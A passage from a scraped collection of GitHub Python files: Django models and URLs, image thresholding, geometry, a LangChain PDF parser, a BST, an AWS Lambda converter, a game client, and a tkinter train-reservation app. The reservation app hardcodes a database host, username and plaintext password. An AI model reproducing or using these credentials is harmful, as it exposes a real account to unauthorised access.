models.CharField(max_length=255, null=True)),\n ('info', models.TextField(null=True)),\n ('map_img', models.ImageField(upload_to=b'maps', blank=True)),\n ('image', models.ImageField(upload_to=b'recommendations')),\n ('phone_number', models.CharField(max_length=13, null=True)),\n ],\n ),\n ]\n","repo_name":"RababKM/Recoms","sub_path":"main/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"32408571593","text":"import cv2 as cv \nimport numpy as np \n\nimg = cv.imread('../Images/thresholding.png',0)\ncv.imshow('Before binarization',img)\ncv.waitKey(0)\n\nthresh, binarized = cv.threshold(img,0,255,cv.THRESH_BINARY+cv.THRESH_OTSU)\n\n#Threshold value as found by Otsu's Algorithm\nprint(\"Threshold value: \",thresh)\n\ncv.imshow('Binarized Image',binarized)\ncv.waitKey(0)\n","repo_name":"mahirjain25/Digital-Image-Processing","sub_path":"Thresholding/otsu.py","file_name":"otsu.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"22056181837","text":"import numpy as np\n\ndef vol_tehrahedron(poly):\n \"\"\"volume of a irregular tetrahedron\"\"\"\n a = np.array(poly[0])\n b = np.array(poly[1])\n c = np.array(poly[2])\n d = np.array(poly[3])\n return abs(np.dot((a-d), np.cross((b-d),(c-d))) / 6)\n\ndef central_p(poly1,poly2):\n central_point = np.array([0.0, 0.0, 0.0])\n for i in range(len(poly1)):\n central_point += np.array(poly1[i]) + np.array(poly2[i])\n return central_point/ (len(poly1)) / 2\n\ndef vol(poly1,poly2):\n \"\"\"\"volume of a zone defined by two polygon bases \"\"\"\n c_point = central_p(poly1, poly2)\n c_point = (c_point[0], c_point[1], c_point[2])\n vol_therah = 0\n N = len(poly1)\n poly1.append(poly1[0])\n poly2.append(poly2[0])\n for i in range(N-2):\n # the upper part\n tehrahedron = [c_point,poly1[0], poly1[i+1], poly1[i+2]]\n vol_therah += vol_tehrahedron(tehrahedron)\n # the bottom part\n tehrahedron = [c_point,poly2[0], poly2[i+1], poly2[i+2]]\n vol_therah += vol_tehrahedron(tehrahedron)\n # the middle part\n for i in range(N):\n tehrahedron = [c_point, poly1[i], poly2[i], poly2[i+1]]\n vol_therah += vol_tehrahedron(tehrahedron)\n tehrahedron = [c_point, poly1[i], poly1[i+1], poly2[i]]\n vol_therah += vol_tehrahedron(tehrahedron)\n return vol_therah","repo_name":"cmiller8/eppy","sub_path":"eppy/geometry/volume_zone.py","file_name":"volume_zone.py","file_ext":"py","file_size_in_byte":1333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"19"} +{"seq_id":"42804431675","text":"import os\nimport re\nimport PyPDF2\nfrom langchain.callbacks import get_openai_callback\nfrom langchain.chat_models import ChatOpenAI\nfrom langchain.schema import HumanMessage\nfrom config.config import TOKEN\n\n# Set the OpenAI API key\nos.environ['OPENAI_API_KEY'] = TOKEN\n\n# Open the PDF file\nwith open('../input/ABC123_verificacion_vehicular.pdf', 'rb') as pdfFileObj:\n # Create a PDF reader object\n pdfReader = PyPDF2.PdfReader(pdfFileObj)\n\n # Get the number of pages in the PDF file\n print(f\"Number of pages: {len(pdfReader.pages)}\")\n\n # Get the first page of the PDF\n pageObj = pdfReader.pages[0]\n\n # Extract the text from the page and remove extra spaces between characters\n text = re.sub(r\"(?<=\\w) (?=\\w)\", \"\", pageObj.extract_text())\n\n # Search for the license plate in the text\n match = re.search(r'(placa|Número de Placa|patente|license_plate)(.{0,30})', text, re.IGNORECASE | re.DOTALL)\n if match:\n segment = match.group(0) # The license plate and the following 30 characters\n else:\n print(\"No license plate found in the document.\")\n exit(1)\n\n# Construct the content for the chat\ncontent = \"You are a text interpreter API. Your responses should always be in JSON format, using the following \" \\\n \"structure: {\\\"result\\\": \\\"$result\\\"}. Now, please search the license_plate or also called placa in spanish in \" \\\n \"the following text: \" + segment\n\n# Initialize the chat model\nchat = ChatOpenAI(temperature=0, model_name=\"gpt-3.5-turbo\")\n\n# Use the OpenAI callback to print the chat response and callback\nwith get_openai_callback() as cb:\n print(chat([HumanMessage(content=content)]))\n print(cb)\n","repo_name":"ldmarz/nlp-scripts","sub_path":"src/text_from_pdf_extractor.py","file_name":"text_from_pdf_extractor.py","file_ext":"py","file_size_in_byte":1682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"33593164302","text":"class Node:\n def __init__(self, data=None, left=None, right=None):\n self.data = data\n self.left = left\n self.right = right\n\nclass BST:\n def __init__(self):\n self.root = None\n self.size = 0\n\n def insert(self, item):\n node = Node(item)\n if self.root is None:\n self.root = node\n else:\n current = self.root\n while True:\n if item < current.data:\n if current.left is None:\n current.left = node\n break\n else:\n current = current.left\n else:\n if current.right is None:\n current.right = node\n break\n else:\n current = current.right\n self.size += 1\n\n def delete(self, item):\n self.root = self._delete(self.root, item)\n\n def _delete(self, node, item):\n if node is None:\n return None\n if item < node.data:\n node.left = self._delete(node.left, item)\n elif item > node.data:\n node.right = self._delete(node.right, item)\n else:\n if node.left is None:\n return node.right\n elif node.right is None:\n return node.left\n else:\n min_node = self._find_min(node.right)\n node.data = min_node.data\n node.right = self._delete(node.right, min_node.data)\n self.size -= 1\n return node\n\n def _find_min(self, node):\n while node.left is not None:\n node = node.left\n return node\n\n def search(self, item):\n current = self.root\n while current is not None:\n if item == current.data:\n return True\n elif item < current.data:\n current = current.left\n else:\n current = current.right\n return False\n\n def size(self):\n return self.size\n","repo_name":"nanduskumar33/pythonAssignments","sub_path":"bst.py","file_name":"bst.py","file_ext":"py","file_size_in_byte":2075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"37124679687","text":"import json\nimport urllib.parse\nimport boto3\nimport csv\nprint('Loading function')\ns3 = boto3.client('s3')\n\ndef lambda_handler(event, context):\n print(\"Received event: \" + json.dumps(event, indent=2))\n # Get the object from the event and show its content type\n bucket = event['Records'][0]['s3']['bucket']['name']\n key = urllib.parse.unquote_plus(event['Records'][0]['s3']['object']['key'], encoding='utf-8')\n if \"json\" in key:\n try:\n response = s3.get_object(Bucket=bucket, Key=key)\n response_body = response['Body'].read()\n data = json.loads(response_body.decode('utf-8'))\n Flat_json = flatten_json(data['web-app']) \n write_csv(Flat_json,'|')\n upload_file()\n #write the data into '/tmp' folder\n return response['ContentType']\n except Exception as e:\n print(e)\n print('Error getting object {} from bucket {}. Make sure they exist and your bucket is in the same region as this function.'.format(key, bucket))\n raise e\n \ndef flatten_json(y):\n out = {}\n def flatten(x, name=''):\n if type(x) is dict:\n for a in x:\n flatten(x[a],name +a+ '|')\n elif type(x) is list:\n i = 0\n for a in x:\n flatten(a, name + str(i) + '|')\n i += 1\n else:\n out[name[:-1]] = x\n\n flatten(y)\n return out\n \n# Upload the file\ndef upload_file():\n #Method 2: Client.put_object()\n s3 = boto3.resource('s3')\n #try:\n #print('bucketname'+str(bucket))\n s3.Bucket('testingdmsunique').upload_file(r'/tmp/SampleJson.csv', 'SampleJson1.csv')\n #except ClientError as e:\n # logging.error(type(e))\n # return False\n return True\n\ndef write_csv(flat_json,delim):\n data_file = open(r'/tmp/SampleJson.csv', 'w',newline='') \n # create the csv writer object \n csv_writer = csv.writer(data_file) \n # Counter variable used for writing \n # headers to the CSV file \n count = 0\n count2 = 0\n print(data_file)\n \n for f in flat_json: \n if count == 0: \n # Writing headers of CSV file \n header = flat_json.keys()\n csv_writer.writerow(header) \n count += 1 \n # Writing data of CSV file \n for k,v in flat_json.items():\n concat = str(k)+str(delim)+str(v)\n csv_writer.writerow([concat])\n data_file.close()\n \n \n","repo_name":"divadf/dms-fileconv","sub_path":"lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":2477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"74084018922","text":"from direct.directnotify.DirectNotifyGlobal import directNotify\nfrom direct.interval.IntervalGlobal import Sequence, Wait, Func, SoundInterval\nfrom direct.interval.IntervalGlobal import Parallel, LerpPosInterval, LerpQuatInterval, LerpHprInterval\n\nfrom DistributedPlayerToonShared import DistributedPlayerToonShared\nfrom src.coginvasion.toon.DistributedToon import DistributedToon\nfrom src.coginvasion.gags.backpack.Backpack import Backpack\nfrom src.coginvasion.gags import GagGlobals\nfrom src.coginvasion.gui.LaffOMeter import LaffOMeter\nfrom src.coginvasion.hood import LinkTunnel\nfrom src.coginvasion.globals import ChatGlobals\nfrom src.coginvasion.phys import PhysicsUtils\nfrom src.coginvasion.distributed import AdminCommands\n\nclass DistributedPlayerToon(DistributedToon, DistributedPlayerToonShared):\n notify = directNotify.newCategory('DistributedPlayerToon')\n \n def __init__(self, cr):\n try:\n self.DistributedPlayerToon_initialized\n return\n except:\n self.DistributedPlayerToon_initialized = 1\n DistributedToon.__init__(self, cr)\n DistributedPlayerToonShared.__init__(self)\n self.role = None\n self.ghost = 0\n self.puInventory = []\n self.equippedPU = -1\n self.backpack = Backpack(self)\n self.battleMeter = None\n self.headMeter = None\n self.firstTimeChangingHP = True\n \n # Quest-related variables.\n self.quests = \"\"\n self.tier = None\n self.questHistory = None\n \n self.busy = 1\n self.friends = None\n self.tutDone = 0\n self.hoodsDiscovered = []\n self.teleportAccess = []\n self.lastHood = 0\n self.defaultShard = 0\n self.tunnelTrack = None\n self.trackExperience = dict(GagGlobals.DefaultTrackExperiences)\n \n self.takeDmgSfx = base.audio3d.loadSfx('phase_5/audio/sfx/tt_s_ara_cfg_toonHit.ogg')\n base.audio3d.attachSoundToObject(self.takeDmgSfx, self)\n return\n \n def getHealth(self):\n return DistributedPlayerToonShared.getHealth(self)\n \n def getMaxHealth(self):\n return DistributedPlayerToonShared.getMaxHealth(self)\n \n def stopSmooth(self):\n DistributedToon.stopSmooth(self)\n localAvatarReachable = (hasattr(base, 'localAvatar') and base.localAvatar)\n if localAvatarReachable and self.doId != base.localAvatar.doId:\n self.resetTorsoRotation()\n\n def handleHealthChange(self, hp, oldHp):\n if hp < oldHp and not self.firstTimeChangingHP:\n # We took damage, make oof sound.\n self.takeDmgSfx.play()\n\n def setHealth(self, health):\n self.handleHealthChange(health, self.getHealth())\n DistributedToon.setHealth(self, health)\n if self.doId != base.localAvatar.doId:\n if not self.firstTimeChangingHP:\n if health < self.getMaxHealth():\n if not self.headMeter:\n self.__makeHeadMeter()\n else:\n self.__updateHeadMeter()\n else:\n self.__removeHeadMeter()\n self.firstTimeChangingHP = False\n\n def announceHealthAndPlaySound(self, level, hp, extraId = -1):\n DistributedToon.announceHealth(self, level, hp, extraId)\n hpSfx = base.audio3d.loadSfx('phase_11/audio/sfx/LB_toonup.ogg')\n base.audio3d.attachSoundToObject(hpSfx, self)\n SoundInterval(hpSfx, node = self).start()\n del hpSfx\n \n def setChat(self, chat):\n chat = ChatGlobals.filterChat(chat, self.animal)\n DistributedToon.setChat(self, chat)\n \n def goThroughTunnel(self, toZone, inOrOut, requestStatus = None):\n # inOrOut: 0 = in; 1 = out\n\n if self.tunnelTrack:\n self.ignore(self.tunnelTrack.getDoneEvent())\n self.tunnelTrack.finish()\n self.tunnelTrack = None\n\n linkTunnel = LinkTunnel.getTunnelThatGoesToZone(toZone)\n if not linkTunnel:\n return\n self.tunnelTrack = Parallel(name = self.uniqueName('Place.goThroughTunnel'))\n\n if inOrOut == 0:\n # Going in a tunnel!\n pivotPoint = linkTunnel.inPivotPoint\n pivotPointNode = linkTunnel.tunnel.attachNewNode('tunnelPivotPoint')\n pivotPointNode.setPos(pivotPoint)\n pivotPointNode.setHpr(linkTunnel.inPivotStartHpr)\n \n x, y, z = self.getPos(render)\n surfZ = PhysicsUtils.getNearestGroundSurfaceZ(self, self.getHeight() + self.getHeight() / 2.0)\n \n if not surfZ == -1:\n # Let's use the ray-tested surface z-point instead so we don't come out of the tunnel hovering.\n # This is just in case the user jumped into the tunnel, which in that case would mean that they are\n # airborne and we can't depend on their current Z value.\n z = surfZ\n \n if base.localAvatar.doId == self.doId:\n doneMethod = self._handleWentInTunnel\n extraArgs = [requestStatus]\n base.localAvatar.walkControls.setCollisionsActive(0, andPlaceOnGround=1)\n self.resetHeadHpr(override = True)\n camera.wrtReparentTo(linkTunnel.tunnel)\n currCamPos = camera.getPos()\n currCamHpr = camera.getHpr()\n tunnelCamPos = linkTunnel.camPos\n tunnelCamHpr = linkTunnel.camHpr\n camera.setPos(tunnelCamPos)\n camera.setHpr(tunnelCamHpr)\n self.tunnelTrack.append(LerpPosInterval(\n camera,\n duration = 0.7,\n pos = tunnelCamPos,\n startPos = currCamPos,\n blendType = 'easeOut'\n ))\n self.tunnelTrack.append(LerpQuatInterval(\n camera,\n duration = 0.7,\n quat = tunnelCamHpr,\n startHpr = currCamHpr,\n blendType = 'easeOut'\n ))\n\n self.wrtReparentTo(pivotPointNode)\n self.setPos(x, y, z)\n self.resetTorsoRotation()\n self.stopLookAround()\n \n if linkTunnel.__class__.__name__ == \"SafeZoneLinkTunnel\":\n self.setHpr(180, 0, 0)\n else:\n self.setHpr(0, 0, 0)\n \n exitSeq = Sequence(Func(self.loop, 'run'))\n if base.localAvatar.doId == self.doId:\n exitSeq.append(Wait(2.0))\n exitSeq.append(Func(base.transitions.irisOut))\n self.tunnelTrack.append(exitSeq)\n self.tunnelTrack.append(Sequence(\n LerpHprInterval(\n pivotPointNode,\n duration = 2.0,\n hpr = linkTunnel.inPivotEndHpr,\n startHpr = linkTunnel.inPivotStartHpr,\n ), LerpPosInterval(\n pivotPointNode,\n duration = 1.0,\n pos = (linkTunnel.inPivotEndX, pivotPointNode.getY(), pivotPointNode.getZ()),\n startPos = (linkTunnel.inPivotStartX, pivotPointNode.getY(), pivotPointNode.getZ())\n ), Func(self.reparentTo, hidden)))\n elif inOrOut == 1:\n \n # Going out!\n pivotPoint = linkTunnel.outPivotPoint\n pivotPointNode = linkTunnel.tunnel.attachNewNode('tunnelPivotPoint')\n pivotPointNode.setPos(pivotPoint)\n pivotPointNode.setHpr(linkTunnel.outPivotStartHpr)\n \n exitSeq = Sequence()\n \n if base.localAvatar.doId == self.doId:\n base.localAvatar.walkControls.setCollisionsActive(0, andPlaceOnGround=1)\n base.localAvatar.detachCamera()\n camera.reparentTo(linkTunnel.tunnel)\n tunnelCamPos = linkTunnel.camPos\n tunnelCamHpr = linkTunnel.camHpr\n camera.setPos(tunnelCamPos)\n camera.setHpr(tunnelCamHpr)\n doneMethod = self._handleCameOutTunnel\n extraArgs = []\n \n exitSeq.append(Func(base.transitions.irisIn))\n else:\n self.stopSmooth()\n \n self.reparentTo(pivotPointNode)\n self.setHpr(linkTunnel.toonOutHpr)\n self.setPos(linkTunnel.toonOutPos)\n \n seq = Sequence(\n Func(self.loop, 'run'),\n LerpPosInterval(\n pivotPointNode,\n duration = 1.0,\n pos = (linkTunnel.outPivotEndX, pivotPointNode.getY(), pivotPointNode.getZ()),\n startPos = (linkTunnel.outPivotStartX, pivotPointNode.getY(), pivotPointNode.getZ())\n ),\n LerpHprInterval(\n pivotPointNode,\n duration = 2.0,\n hpr = linkTunnel.outPivotEndHpr,\n startHpr = linkTunnel.outPivotStartHpr,\n )\n )\n if base.localAvatar.doId != self.doId:\n seq.append(Func(self.startSmooth))\n seq.append(Func(self.wrtReparentTo, render))\n exitSeq.append(seq)\n self.tunnelTrack.append(exitSeq)\n\n if base.localAvatar.doId == self.doId:\n self.tunnelTrack.setDoneEvent(self.tunnelTrack.getName())\n self.acceptOnce(self.tunnelTrack.getDoneEvent(), doneMethod, extraArgs)\n\n self.tunnelTrack.start()\n \n def setDefaultShard(self, shardId):\n self.defaultShard = shardId\n\n def getDefaultShard(self):\n return self.defaultShard\n\n def setLastHood(self, zoneId):\n self.lastHood = zoneId\n\n def b_setLastHood(self, zoneId):\n self.sendUpdate('setLastHood', [zoneId])\n self.setLastHood(zoneId)\n\n def getLastHood(self):\n return self.lastHood\n\n def setTeleportAccess(self, array):\n self.teleportAccess = array\n\n def getTeleportAccess(self):\n return self.teleportAccess\n\n def setHoodsDiscovered(self, array):\n self.hoodsDiscovered = array\n\n def b_setHoodsDiscovered(self, array):\n self.sendUpdate('setHoodsDiscovered', [array])\n self.setHoodsDiscovered(array)\n\n def getHoodsDiscovered(self):\n return self.hoodsDiscovered\n\n def setTutorialCompleted(self, value):\n self.tutDone = value\n\n def getTutorialCompleted(self):\n return self.tutDone\n\n def setFriendsList(self, friends):\n self.friends = friends\n\n def getFriendsList(self):\n return self.friends\n\n def setBusy(self, busy):\n self.busy = busy\n\n def getBusy(self):\n return self.busy\n\n def setTier(self, tier):\n self.tier = tier\n\n def getTier(self):\n return self.tier\n\n def setQuestHistory(self, array):\n self.questHistory = array\n\n def getQuestHistory(self):\n return self.questHistory\n\n def setQuests(self, dataStr):\n self.quests = dataStr\n\n def getQuests(self):\n return self.quests\n\n def maybeMakeHeadMeter(self):\n if base.localAvatar.doId != self.doId:\n if self.getHealth() < self.getMaxHealth():\n if not self.headMeter:\n self.__makeHeadMeter()\n\n def __makeHeadMeter(self):\n self.headMeter = LaffOMeter(forRender = True)\n r, g, b, _ = self.getHeadColor()\n animal = self.getAnimal()\n maxHp = self.getMaxHealth()\n hp = self.getHealth()\n self.headMeter.generate(r, g, b, animal, maxHP = maxHp, initialHP = hp)\n self.headMeter.reparentTo(self)\n self.headMeter.setZ(self.getHeight() + 2)\n self.headMeter.setScale(0.4)\n self.headMeter.setBillboardAxis()\n self.__updateHeadMeter()\n\n def __removeHeadMeter(self):\n if self.headMeter:\n self.headMeter.disable()\n self.headMeter.delete()\n self.headMeter = None\n\n def __updateHeadMeter(self):\n if self.headMeter:\n self.headMeter.updateMeter(self.getHealth())\n \n def d_createBattleMeter(self):\n self.sendUpdate('makeBattleMeter', [])\n\n def b_createBattleMeter(self):\n self.makeBattleMeter()\n self.d_createBattleMeter()\n\n def d_cleanupBattleMeter(self):\n self.sendUpdate('destroyBattleMeter', [])\n\n def b_cleanupBattleMeter(self):\n self.destroyBattleMeter()\n self.d_cleanupBattleMeter()\n\n def makeBattleMeter(self):\n if self.getHealth() < self.getMaxHealth():\n if not self.battleMeter:\n self.battleMeter = LaffOMeter()\n r, g, b, _ = self.getHeadColor()\n animal = self.getAnimal()\n maxHp = self.getMaxHealth()\n hp = self.getHealth()\n self.battleMeter.generate(r, g, b, animal, maxHP = maxHp, initialHP = hp)\n self.battleMeter.reparentTo(self)\n self.battleMeter.setZ(self.getHeight() + 5)\n self.battleMeter.setScale(0.5)\n self.battleMeter.start()\n\n def destroyBattleMeter(self):\n if self.battleMeter:\n self.battleMeter.stop()\n self.battleMeter.disable()\n self.battleMeter.delete()\n self.battleMeter = None\n\n def setEquippedPU(self, index):\n self.equippedPU = index\n\n def getEquippedPU(self):\n return self.equippedPU\n\n def setPUInventory(self, array):\n self.puInventory = array\n\n def getPUInventory(self):\n return self.puInventory\n\n def setGhost(self, value):\n self.ghost = value\n self.handleGhost(value)\n\n def d_setGhost(self, value):\n self.sendUpdate(\"setGhost\", [value])\n\n def b_setGhost(self, value):\n self.d_setGhost(value)\n self.setGhost(value)\n\n def getGhost(self):\n return self.ghost\n\n def getBackpack(self):\n return self.backpack\n\n def setEquippedAttack(self, attackID):\n try: \n self.backpack.setCurrentGag(attackID) \n except:\n # If we couldn't do this, it means that the avatar was most likely disabled. \n pass\n DistributedToon.setEquippedAttack(self, attackID)\n\n def getCurrentGag(self):\n return self.getEquippedAttack()\n\n def setLoadout(self, gagIds):\n if self.backpack:\n loadout = []\n for i in range(len(gagIds)):\n gagId = gagIds[i]\n gag = self.backpack.getGagByID(gagId)\n if gag:\n loadout.append(gag)\n self.backpack.setLoadout(loadout)\n \n def setBackpackAmmo(self, netString):\n if len(self.attackIds) != 0 or len(self.attacks) != 0:\n self.cleanupAttacks()\n self.clearAttackIds()\n return self.backpack.updateSuppliesFromNetString(netString)\n \n def getBackpackAmmo(self):\n if self.backpack:\n return self.backpack.netString\n return GagGlobals.getDefaultBackpack().toNetString()\n \n def setTrackExperience(self, netString):\n self.trackExperience = GagGlobals.getTrackExperienceFromNetString(netString)\n if GagGlobals.processTrackData(self.trackExperience, self.backpack) and self == base.localAvatar:\n if base.localAvatar.invGui:\n base.localAvatar.reloadInvGui()\n \n def getTrackExperience(self):\n return GagGlobals.trackExperienceToNetString(self.trackExperience)\n\n def updateAttackAmmo(self, gagId, ammo, maxAmmo, ammo2, maxAmmo2, clip, maxClip):\n if self.useBackpack():\n self.backpack.setSupply(gagId, ammo)\n else:\n DistributedToon.updateAttackAmmo(self, gagId, ammo, maxAmmo, ammo2, maxAmmo2, clip, maxClip)\n\n def setMoney(self, money):\n self.money = money\n\n def getMoney(self):\n return self.money\n\n def setAccessLevel(self, value):\n prevLevel = self.getAccessLevel()\n self.role = AdminCommands.Roles.get(value, None)\n \n if prevLevel != AdminCommands.NoAccess:\n # Let's remove any tokens that already are showing up.\n DistributedToon.removeAdminToken(self)\n \n if self.role:\n # Let's put a new token above our head.\n DistributedToon.setAdminToken(self, self.role.token)\n\n def getAccessLevel(self):\n return AdminCommands.NoAccess if not self.role else self.role.accessLevel\n \n def disable(self):\n base.audio3d.detachSound(self.takeDmgSfx)\n self.takeDmgSfx = None\n if self.tunnelTrack:\n self.ignore(self.tunnelTrack.getDoneEvent())\n self.tunnelTrack.finish()\n self.tunnelTrack = None\n self.role = None\n self.ghost = None\n self.puInventory = None\n self.equippedPU = None\n if self.backpack:\n self.backpack.cleanup()\n self.backpack = None\n self.firstTimeChangingHP = None\n self.quests = None\n self.tier = None\n self.questHistory = None\n self.busy = None\n self.friends = None\n self.tutDone = None\n self.hoodsDiscovered = None\n self.teleportAccess = None\n self.lastHood = None\n self.defaultShard = None\n self.trackExperience = None\n self.__removeHeadMeter()\n self.destroyBattleMeter()\n DistributedToon.disable(self)\n \n def delete(self):\n try:\n self.DistributedPlayerToon_deleted\n except:\n self.DistributedPlayerToon_deleted = 1\n DistributedPlayerToonShared.delete(self)\n del self.takeDmgSfx\n del self.tunnelTrack\n del self.role\n del self.ghost\n del self.puInventory\n del self.equippedPU\n del self.backpack\n del self.firstTimeChangingHP\n del self.quests\n del self.tier\n del self.questHistory\n del self.busy\n del self.friends\n del self.tutDone\n del self.hoodsDiscovered\n del self.teleportAccess\n del self.lastHood\n del self.defaultShard\n del self.trackExperience\n del self.battleMeter\n del self.headMeter\n DistributedToon.delete(self)\n return\n","repo_name":"Cog-Invasion-Online/cio-src","sub_path":"game/src/coginvasion/toon/DistributedPlayerToon.py","file_name":"DistributedPlayerToon.py","file_ext":"py","file_size_in_byte":18496,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"19"} +{"seq_id":"26067499157","text":"from rest_framework import routers\nfrom accounts import views as accounts_views\nfrom django.conf.urls import url, include\nfrom django.urls import path\n\nrouter = routers.DefaultRouter()\nrouter.register(r'register', accounts_views.SignupViewSet, basename='register'),\nrouter.register(r'book_list', accounts_views.BookList, basename='book_list'),\nrouter.register(r'add_into_book_list', accounts_views.AddBook, basename='add_into_book_list'),\nrouter.register(r'delete_book', accounts_views.DeleteBook, basename='delete_book'),\nrouter.register(r'book_details', accounts_views.BookDetails, basename='book_details'),\nrouter.register(r'update_book_details', accounts_views.UpdateBookDetails, basename='update_book_details'),\n\nurlpatterns = [\n url(r'', include(router.urls)),\n url(r'^login', accounts_views.LoginViewSet.as_view(), name=\"login\"),\n]\n","repo_name":"prajktaraje/keywordio","sub_path":"DjangoBackend/LibraryManagementSystemBackend/rest_api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"32920174625","text":"#Arthi Nithi, Anjani Agrawal, Alan Chiang, Alaap Murali\n\nfrom tkinter import *\nfrom tkinter import messagebox\nfrom tkinter.ttk import *\nimport pymysql\nimport calendar\nimport datetime\nfrom math import *\nimport time\nclass Phase_three:\n def __init__(self,primaryWin):\n self.primaryWin = primaryWin\n self.Login()\n self.results1 = []\n self.entrys=[]\n self.newUserWindow = Toplevel()\n #self.Register()\n self.newUserWindow.title(\"New User Registration\")\n self.newUserWindow.withdraw()\n\n self.primaryWindow = Toplevel()\n self.primaryWindow.title(\"Welcome \"+self.username.get())\n self.primaryWindow.withdraw()\n\n self.schoolInfoWin= Toplevel()\n self.schoolInfoWin.title(\"Add School Info\")\n self.schoolInfoWin.withdraw()\n\n self.trainSchWin= Toplevel()\n self.trainSchWin.title(\"View Train Schedule\")\n self.trainSchWin.withdraw()\n\n self.scheduleWin= Toplevel()\n self.scheduleWin.title(\"View Train Schedule\")\n self.scheduleWin.withdraw()\n\n self.findAvailWindow= Toplevel()\n self.findAvailWindow.title(\"Search Train\")\n self.findAvailWindow.withdraw()\n\n self.departureWin = Toplevel()\n self.departureWin.title(\"Select Departure\")\n self.departureWin.withdraw()\n\n self.passengerInfoWin = Toplevel()\n self.passengerInfoWin.title(\"Travel Extras & Passenger Info\")\n self.passengerInfoWin.withdraw()\n\n self.reservationWin = Toplevel()\n self.reservationWin.title(\"Make Reservation\")\n self.reservationWin.withdraw()\n\n self.paymentIWin = Toplevel()\n self.paymentIWin.title(\"Add Card\")\n self.paymentIWin.withdraw()\n\n self.paymentIWin2 = Toplevel()\n self.paymentIWin2.title(\"Delete Card\")\n self.paymentIWin2.withdraw()\n\n self.confirm = Toplevel()\n self.confirm.title(\"Confirmation\")\n self.confirm.withdraw()\n\n self.updateWin = Toplevel()\n self.updateWin.title(\"Update Reservation\")\n self.updateWin.withdraw()\n\n self.updateWin2 = Toplevel()\n self.updateWin2.title(\"Update Reservation\")\n self.updateWin2.withdraw()\n\n self.updateWin3 = Toplevel()\n self.updateWin3.title(\"Update Reservation\")\n self.updateWin3.withdraw()\n\n self.cancelWin = Toplevel()\n self.cancelWin.title(\"Cancel Reservation\")\n self.cancelWin.withdraw()\n\n self.cancelWin2 = Toplevel()\n self.cancelWin2.title(\"Cancel Reservation\")\n self.cancelWin2.withdraw()\n\n self.viewReviewWin = Toplevel()\n self.viewReviewWin.title(\"View review\")\n self.viewReviewWin.withdraw()\n\n self.viewReviewWin2 = Toplevel()\n self.viewReviewWin2.title(\"View review\")\n self.viewReviewWin2.withdraw()\n\n self.giveReviewWin = Toplevel()\n self.giveReviewWin.title(\"Give Review\")\n self.giveReviewWin.withdraw()\n\n self.viewRevenueReport = Toplevel()\n self.viewRevenueReport.title(\"View Revenue Report\")\n self.viewRevenueReport.withdraw()\n\n self.viewpopRRWin = Toplevel()\n self.viewpopRRWin.title(\"View Popular Route Report\")\n self.viewpopRRWin.withdraw()\n\n def Connect(self):\n try:\n db = pymysql.connect(host=\"academic-mysql.cc.gatech.edu\", user=\"cs4400_Team_48\", passwd=\"dwet2rPC\",db=\"cs4400_Team_48\")\n return db\n except:\n messagebox.showerror(\"Error\", \"Check Internet Connection\")\n\n def Login(self):\n self.primaryWin.title(\"Login\")\n frame = Frame(self.primaryWin)\n frame.pack()\n frame2 = Frame(self.primaryWin)\n frame2.pack()\n\n label1 = Label(frame,text = \"Username\")\n label2 = Label(frame,text =\"Password\")\n label1.grid(row = 0, column = 0,sticky=E)\n label2.grid(row = 1, column = 0,sticky=E)\n self.username = StringVar()\n self.password = StringVar()\n entry1 = Entry(frame, textvariable = self.username, width = 30)\n entry1.grid(row = 0, column = 1)\n entry2 = Entry(frame, textvariable = self.password, width = 30)\n entry2.grid(row = 1, column = 1)\n\n b1=Button(frame2, text =\"Login\", command=self.loginCredentials)\n b1.pack(side=LEFT)\n b2=Button(frame2, text =\"Register\", command= self.switchToRegister)\n b2.pack(side=LEFT)\n\n def loginCredentials(self):\n if self.username.get() == \"\" or self.password.get() == \"\":\n messagebox.showerror(\"Error\", \"Invalid input\")\n return\n\n server = self.Connect()\n cursor = server.cursor()\n query = \"SELECT Username FROM CUSTOMER \\\n WHERE (CUSTOMER.Username = '%s' AND (SELECT Password FROM USER WHERE CUSTOMER.Username = USER.Username) = '%s')\" % (self.username.get(), self.password.get())\n cursor.execute(query)\n result1 = cursor.fetchall()\n query = \"SELECT Username FROM MANAGER \\\n WHERE (MANAGER.Username = '%s' AND (SELECT Password FROM USER WHERE MANAGER.Username = USER.Username) = '%s')\" % (self.username.get(), self.password.get())\n\n cursor.execute(query)\n result2 = cursor.fetchall()\n\n if len(result1) != 0:\n self.custOrManag = \"customer\"\n for row in result1:\n self.name = row[0]\n self.switchtoMainMenu()\n elif len(result2) != 0:\n self.custOrManag = \"manager\"\n for row in result2:\n self.name = row[0]\n self.switchtoMainMenu()\n else:\n messagebox.showerror(\"Error\", \"Invalid username or password\")\n\n def mainMenu(self):\n self.primaryWindow = Toplevel()\n self.primaryWindow.title(\"Choose Functionality \")\n buttonsFrame = Frame(self.primaryWindow)\n buttonsFrame.pack()\n if self.custOrManag == \"customer\":\n b1 = Button(buttonsFrame, text =\"View Train Schedule\", command = self.trainSchedule)\n b1.grid(row = 0, column = 0, columnspan = 2, sticky = EW)\n b2 = Button(buttonsFrame, text =\"Make a new reservation\", command = self.searchTrain)\n b2.grid(row = 1, column = 0, columnspan = 2, sticky = EW)\n b3 = Button(buttonsFrame, text =\"Update a reservation\", command = self.updateReservation)\n b3.grid(row = 2, column = 0, columnspan = 2, sticky = EW)\n b4 = Button(buttonsFrame, text =\"Cancel a reservation\", command = self.cancelRes)\n b4.grid(row = 3, column = 0, columnspan = 2, sticky = EW)\n b5 = Button(buttonsFrame, text =\"Give review\", command = self.giveReview)\n b5.grid(row = 4, column = 0, columnspan = 2, sticky = EW)\n b6 = 